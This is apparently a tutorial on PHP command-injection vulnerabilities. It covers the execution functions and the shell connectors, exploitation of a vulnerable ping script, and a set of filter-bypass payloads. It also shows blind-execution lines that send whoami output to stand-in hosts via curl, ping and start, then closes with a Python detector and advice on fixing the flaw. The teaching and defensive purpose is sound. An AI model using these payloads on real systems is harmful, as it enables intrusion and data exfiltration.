Command Execution Vulnerability
- Principle: some functions of an application call functions that execute system commands. If their parameters are controlled by the user, extra commands can be spliced onto the normal function through command connectors, so arbitrary system commands can be executed
Common PHP command execution functions and operators
system function
Used to execute external programs and display output
string system(string $command [, int &$return_var])
//index.php <?php system('whoami');?>
Outputs root after execution (the user the web server runs as)
exec function
Used to execute an external program
string exec(string $command [, array &$output [, int &$return_var]])
//index.php <?php echo exec('whoami');?>
Because exec returns the output instead of printing it, echo is needed to display the result of whoami
shell_exec function
Execute the command through the shell environment and return the complete output as a string
string shell_exec(string $cmd)
//index.php <?php echo shell_exec('whoami');?>
Because shell_exec returns the output as a string, echo is needed to display the result of whoami
passthru function
Used to execute an external program and display its raw output
void passthru(string $command [, int &$return_var])
//index.php <?php passthru('whoami');?>
Outputs root after execution
popen function
Open process file pointer
resource popen (string $command,string $mode)
//index.php <?php popen("touch test.txt","r")?>
After the code is executed, the file test.txt is created in the current directory
proc_open function
Opens a process file pointer, like popen but with control over the process's pipes
resource proc_open(string $cmd, array $descriptorspec, array &$pipes [, string $cwd [, array $other_options]])
//index.php <?php $proc=proc_open("whoami", array(array("pipe","r"), array("pipe","w"), array("pipe","w")), $pipes); print stream_get_contents($pipes[1]); ?>
The output of whoami is printed after execution
Backtick operator
The backtick is the PHP execution operator: PHP tries to execute the contents between the backticks as a shell command and returns the output
//index.php <?php echo `whoami`;?>
Outputs `root` after execution
Command execution vulnerability under Windows
Command connectors
& connector
If the preceding statement is false, the statement after & is still executed
If the preceding statement is true, it is also executed (both sides run regardless of the result)
&& connector
If the preceding statement is false, an error is reported and the following statement is not executed
If the preceding statement is true, both the preceding and the following statements are executed
| connector
If the preceding statement is false, an error is reported and the following statement is not executed
If the preceding statement is true, the following statement is executed
|| connector
If the preceding statement is false, the following statement is executed
If the preceding statement is true, only the statement before || is executed; the statement after || is not
Exploitation
Example
<?php $ip=$_GET['ip']; system("ping ".$ip); ?>
Normal input ?ip=127.0.0.1 returns the result of ping
Input ?ip=127.0.0.1|whoami
This returns the current user's information. Of course, net user and other sensitive user-account-management operations can be executed in the same way
Command execution vulnerability under Linux
Command connectors
; connector
The semicolon makes the commands before and after it execute in sequence
For example, running id;id on Linux executes the first and second id commands and outputs the current user information twice
& connector
& makes the preceding command run in the background, so multiple commands execute at the same time
For example, id & whoami runs both commands and outputs the user information
&& connector
The following command is executed only if the preceding command succeeded
| connector
The output of the preceding command is passed as input to the following command; both run, but only the result of the following command is displayed
|| connector
If the preceding command succeeds, the following command is not executed; if the preceding command fails, the following command is executed
Exploitation
Example
<?php $ip=$_GET['ip']; system("ping -c 3 ".$ip); ?>
The code calls the system function. The input ?ip=127.0.0.1;id returns the user information once the ping completes. Of course, other Linux commands can be executed the same way
Command execution bypass
Bypass space filtering
${IFS} bypass
${IFS} is a special shell environment variable, the internal field separator on Linux. The value stored in $IFS can be a space, tab, newline or other custom characters; by default it is whitespace, which is why ${IFS} can stand in for a space
example
<?php $ip=$_GET['ip']; system("ping -c 3 ".$ip); ?>
input
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat${IFS}commandexec.php
Returns the source code of commandexec.php
$IFS bypass
Usage is similar to ${IFS}
Tab bypass
%09 is the URL encoding of a tab character; using %09 in place of spaces bypasses space filtering
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat%09commandexec.php
{} bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;{cat,commandexec.php}
< bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;cat<commandexec.php
Bypass keyword filtering
Variable splicing bypass
The shell supports variable assignment, so a filtered keyword can be assembled by splicing variables together
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;a=c;b=at;$a$b commandexec.php
Null variable bypass
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;ca${x}t commandexec.php
System variable bypass
${SHELLOPTS} is a system variable; characters cut out of such system variables can be spliced together to bypass keyword filtering
Backslash bypass
For example, c\a\t bypasses filtering of the cat keyword, because the shell removes the backslashes before executing the command
Wildcard bypass
* matches zero or more characters
? matches any single character
[] matches any one character from the range inside the brackets
Example
/etc/passwd
can be written as
/???/???sw?
to bypass the filter
Reverse shell bypass
When a reverse shell payload is filtered, wildcards can be used to bypass the filtering and execute the command
base64 encoding bypass
For example, the base64 encoding of id is aWQ=; decoding it with base64 -d bypasses the filtering
For example
http://xxx.xxx.xxx.xxx/exec/commandexec.php?ip=127.0.0.1;`echo "aWQ=" | base64 -d`
expr and awk bypass
Characters are read from another file and the command is constructed with the expr and awk commands
For example, if the file fff contains the string wdnmd.com, the following command
expr substr $(awk NR==1 fff) 1 1
returns w, the first character stored in the file
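An added detection example (not part of the original notes), in Python: it pulls the `ip=` parameter out of constructed web-server request lines, URL-decodes it, treats a value that parses as a plain IP address as benign, and otherwise reports which of the connectors and space/keyword bypass tokens from the Windows, Linux and bypass sections above the value contains. The rule names, the `ip` parameter and the sample request lines are my assumptions modelled on this page's payloads.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Indicators taken from the bypass list above, matched against the URL-decoded ip= value.
RULES = [
    ("connector",         re.compile(r"[;|&]")),                 # ; | & && ||
    ("substitution",      re.compile(r"`|\$\(")),                # `cmd` or $(cmd)
    ("ifs_as_space",      re.compile(r"\$\{?IFS\}?")),           # ${IFS} or $IFS
    ("tab_as_space",      re.compile(r"\t")),                    # %09 once decoded
    ("brace_expansion",   re.compile(r"\{[^}]*,[^}]*\}")),       # {cat,file}
    ("redirect_as_space", re.compile(r"<")),                     # cat<file
    ("shell_variable",    re.compile(r"\$\{?[A-Za-z_]\w*\}?")),  # $a$b, ca${x}t
    ("backslash_split",   re.compile(r"\w\\\w")),                # c\a\t
    ("wildcard_path",     re.compile(r"/\S*[?*\[]")),            # /???/???sw?
    ("base64_decode",     re.compile(r"base64\s+-d")),           # echo aWQ= | base64 -d
]
IP_PARAM = re.compile(r"\?ip=(\S*)")  # the value runs to the space before HTTP/1.x

def analyze_value(raw):
    """Decode one ip= value; a well-formed IP address is benign, anything else is scored."""
    decoded = unquote_plus(raw)
    try:
        ipaddress.ip_address(decoded)
        valid_ip = True
    except ValueError:
        valid_ip = False
    indicators = [name for name, rx in RULES if rx.search(decoded)]
    return {"decoded": decoded, "valid_ip": valid_ip, "indicators": indicators}

def scan_log(request_lines):
    """Return (decoded value, indicator names) for every ip= that is not a plain IP."""
    findings = []
    for match in filter(None, map(IP_PARAM.search, request_lines)):
        result = analyze_value(match.group(1))
        if not result["valid_ip"]:
            findings.append((result["decoded"], result["indicators"]))
    return findings

# Constructed request fields modelled on the payloads in the notes above (not real traffic).
SAMPLE_LOG = [
    "GET /exec/commandexec.php?ip=127.0.0.1 HTTP/1.1",
    "GET /exec/commandexec.php?ip=127.0.0.1;cat${IFS}commandexec.php HTTP/1.1",
    "GET /exec/commandexec.php?ip=127.0.0.1;cat%09commandexec.php HTTP/1.1",
    "GET /exec/commandexec.php?ip=127.0.0.1;{cat,commandexec.php} HTTP/1.1",
    "GET /exec/commandexec.php?ip=127.0.0.1;ca${x}t%20commandexec.php HTTP/1.1",
    "GET /exec/commandexec.php?ip=127.0.0.1;`echo%20aWQ=|base64%20-d` HTTP/1.1",
]
```

Running scan_log(SAMPLE_LOG) flags five of the six requests; only the plain 127.0.0.1 passes, which is the allowlist check the repair section below should be enforcing before the value ever reaches system().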
Command execution without echo
If a command executes but its output is not echoed back, obtain a reverse shell to a VPS and run commands from there; if a reverse shell is not possible, the result can still be obtained through DNS resolution, by embedding it in a hostname that is looked up
Get the user name under Linux
curl test.fff.com/`whoami`
ping -c 1 `whoami`.test.fff.com
Under Windows
Get computer name
for /F %x in ('whoami') do start http://xxx.com/%x
user name
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.com
Run the following command on the website to obtain the user name root
curl "http://xxx.com/?`whoami`"
Vulnerability repair
1. Disable sensitive functions with disable_functions in php.ini
2. Filtering functions
escapeshellarg function
The escapeshellarg function converts a string into an argument that can be used safely in a shell command, filtering the parameters passed to the command
string escapeshellarg(string $arg)
The function wraps the string in single quotes and escapes any single quotes already present in it,
so the string can be passed directly to a shell function and is guaranteed to be treated as a single argument
Repair cases
<?php $ip=$_GET['ip']; system("ping -c 3 ".escapeshellarg($ip)); ?>
escapeshellcmd function
Escapes shell metacharacters
string escapeshellcmd(string $command)
Any characters in the string that could trick the shell into running arbitrary commands are escaped; the function ensures that user-supplied data is escaped before it is passed to the system functions or the execution operator
The function places a backslash in front of these characters
<?php $ip=$_GET['ip']; system(escapeshellcmd("ping -c 3 ".$ip)); ?>
Note that escapeshellcmd neutralises the connectors but still lets the user append extra arguments to ping, so for a single parameter escapeshellarg is the stronger choice, ideally after checking that $ip really is an IP address (for example with filter_var($ip, FILTER_VALIDATE_IP))